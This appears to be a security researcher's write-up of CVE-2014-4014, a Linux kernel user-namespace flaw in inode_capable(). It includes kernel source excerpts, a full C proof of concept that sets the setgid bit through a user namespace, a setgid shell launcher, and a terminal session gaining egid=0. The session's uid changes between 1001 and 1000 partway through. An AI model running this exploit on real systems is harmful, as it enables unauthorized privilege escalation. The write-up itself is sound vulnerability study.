CVE-2014-4014: Linux Kernel Local Privilege Escalation "exploitation"

Introduction

The CLONE_NEWUSER namespace was introduced in Linux 2.6.23 and completed in Linux 3.8 (and starting from 3.8, unprivileged processes can create user namespaces). It is used to isolate the user and group ID number spaces, i.e., a process's user and group IDs can be different inside and outside a user namespace. For example, a normal (unprivileged) process can create a namespace in which it has a uid of 0.

Hence, a mapping from the user and group IDs inside a user namespace to a corresponding set of user and group IDs outside the namespace is required. This mapping allows the OS to perform the appropriate permission checks when a process in a user namespace performs operations that affect the system outside that namespace, e.g., file system access. However, a number of Linux filesystems are not yet "fully" user-namespace aware.

The bug lies in the incorrect use of inode_capable(), which decides whether the caller holds a given capability with respect to an inode. Let's take a look at the inode_change_ok() function, which uses inode_capable() to check that the caller has sufficient privileges to perform chown, chgrp and chmod operations:

int inode_change_ok(const struct inode *inode, struct iattr *attr)
{
	....

        /* If force is set do it anyway. */
        if (ia_valid & ATTR_FORCE)
                return 0;

        /* Make sure a caller can chown. */
        if ((ia_valid & ATTR_UID) &&
            (!uid_eq(current_fsuid(), inode->i_uid) ||
             !uid_eq(attr->ia_uid, inode->i_uid)) &&
            !inode_capable(inode, CAP_CHOWN))
                return -EPERM;

        /* Make sure caller can chgrp. */
	....

        /* Make sure a caller can chmod. */
        if (ia_valid & ATTR_MODE) {
                if (!inode_owner_or_capable(inode))                          /* (1) */
                        return -EPERM;
                /* Also check the setgid bit! */
                if (!in_group_p((ia_valid & ATTR_GID) ? attr->ia_gid :
                                inode->i_gid) &&
                    !inode_capable(inode, CAP_FSETID))                       /* (2) */
                        attr->ia_mode &= ~S_ISGID;
        }

At (2), the inode_capable() is called with CAP_FSETID. The inode_capable() is then supposed to check whether the caller is allowed to perform the chmod operation based on the mapping to uid and gid outside the namespace:

bool inode_capable(const struct inode *inode, int cap)
{
        struct user_namespace *ns = current_user_ns();

        return ns_capable(ns, cap) && kuid_has_mapping(ns, inode->i_uid);    /* (3) */
}

However, as can be seen at (3), the check is only performed for inode->i_uid (and not for inode->i_gid). What that means is that if we own a file as a non-privileged user (outside the namespace) with gid set to 0 (how can that happen?), we can set the setgid bit on that file due to the missing inode->i_gid check above. But yes, the file's uid does need to be ours in the first place because of the inode_owner_or_capable() check at (1):

bool inode_owner_or_capable(const struct inode *inode)
{
        if (uid_eq(current_fsuid(), inode->i_uid))
                return true;
        if (inode_capable(inode, CAP_FOWNER))
                return true;
        return false;
}

The following PoC demonstrates the exploitation technique.

PoC

For this example, I'll be using Ubuntu 14.04:

vnik$ uname -a
Linux ubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64

First, let's assume there is a file owned by us (vnik) with gid of 0:

vnik$ id
uid=1001(vnik) gid=1001(vnik) groups=1001(vnik)

vnik$ ls -al test 
-rw-rw-r-- 1 vnik root 0 Jun 19 13:59 test

So, the gid is root and there are no setuid or setgid bits set. Let's create a user namespace where our user is mapped to root.

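#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/stat.h>   /* chmod() and the S_* mode bits */
#include <sys/wait.h>
#include <signal.h>     /* SIGCHLD */
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <limits.h>
#include <string.h>
#include <assert.h>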

#define STACK_SIZE (1024 * 1024)
static char child_stack[STACK_SIZE];

struct args {
    int pipe_fd[2];
    char *file_path;
};

static int child(void *arg) {
    struct args *f_args = (struct args *)arg;
    char c;

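    // close our copy of the pipe's write end, so that read() below
    // returns EOF once the parent closes its copy
    close(f_args->pipe_fd[1]); 

    // block until the parent has written the uid map
    assert(read(f_args->pipe_fd[0], &c, 1) == 0);

    // set the setgid bit
    chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);          /* (5) */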

    return 0;
}

int main(int argc, char *argv[]) {
    int fd;
    pid_t pid;
    char mapping[1024];
    char map_file[PATH_MAX];
    struct args f_args;

    assert(argc == 2);

    f_args.file_path = argv[1];
    // create a pipe for synching the child and parent
    assert(pipe(f_args.pipe_fd) != -1);

    pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);     /* (3) */
    assert(pid != -1);

    // build the map line: uid 0 inside the namespace is our uid outside it
    snprintf(mapping, sizeof(mapping), "0 %ld 1\n", (long) getuid());

    // update the uid map of the child (no gid map is written)
    snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid);
    fd = open(map_file, O_RDWR); assert(fd != -1);

    assert(write(fd, mapping, strlen(mapping)) == (ssize_t) strlen(mapping));           /* (4) */
    close(fd);

    // closing the write end unblocks the child's read()
    close(f_args.pipe_fd[1]);

    assert (waitpid(pid, NULL, 0) != -1);
    return 0;
}

The above code creates a user namespace (3) with a mapping (4) from the current user (outside the namespace) to uid 0 (inside the namespace). The parent writes the mapping while the child waits on the pipe; once the parent closes the write end, the child, running within the new namespace, sets the setgid bit (5) on the supplied file. Since there is no check for kgid_has_mapping(ns, inode->i_gid) in inode_capable(), we can set the setgid bit on a file with an arbitrary gid value (even if we don't belong to that group outside the namespace). Save the PoC as poc.c and compile it:

vnik$ gcc poc.c -o poc

Let's now create a simple shell launcher that we'll use to overwrite the test file:

vnik$ cat << EOF > shell.c
#include <unistd.h>

int main() {
    setgid(0);
    execl("/bin/bash", "-sh", (char *)NULL);
    return 1;
}
EOF

vnik$ gcc shell.c -o shell
vnik$ cp shell test && ls -al ./test
-rw-r--r-- 1 vnik root  8564 Jun 20 13:20 test

Now that we've replaced the test file with our shell (preserving the gid), let's set the setgid bit:

vnik$ ./poc ./test
vnik$ ls -al ./test
-rwxr-s--- 1 vnik root  8564 Jun 20 13:20 test
vnik$ ./test
-sh-4.3$ id  
uid=1000(vnik) gid=1000(vnik) egid=0(root) groups=1000(vnik)

We have egid = 0. Whoopty doo! Yes, we can now read and write files (that were previously only readable or writable by gid = 0) but that does not directly lead to root.

Conclusion

The vulnerable kernel versions do not use inode_capable() correctly when deciding whether the caller has capabilities over an inode: the inode's gid is never checked against the namespace's mappings. A non-privileged user "may" be able to escalate privileges to root. However, good luck finding a file owned by your user with gid = 0 (or whatever gid you're targeting). Once you get egid = 0, what's next? Can we escalate this to root in a generic or distribution-specific way?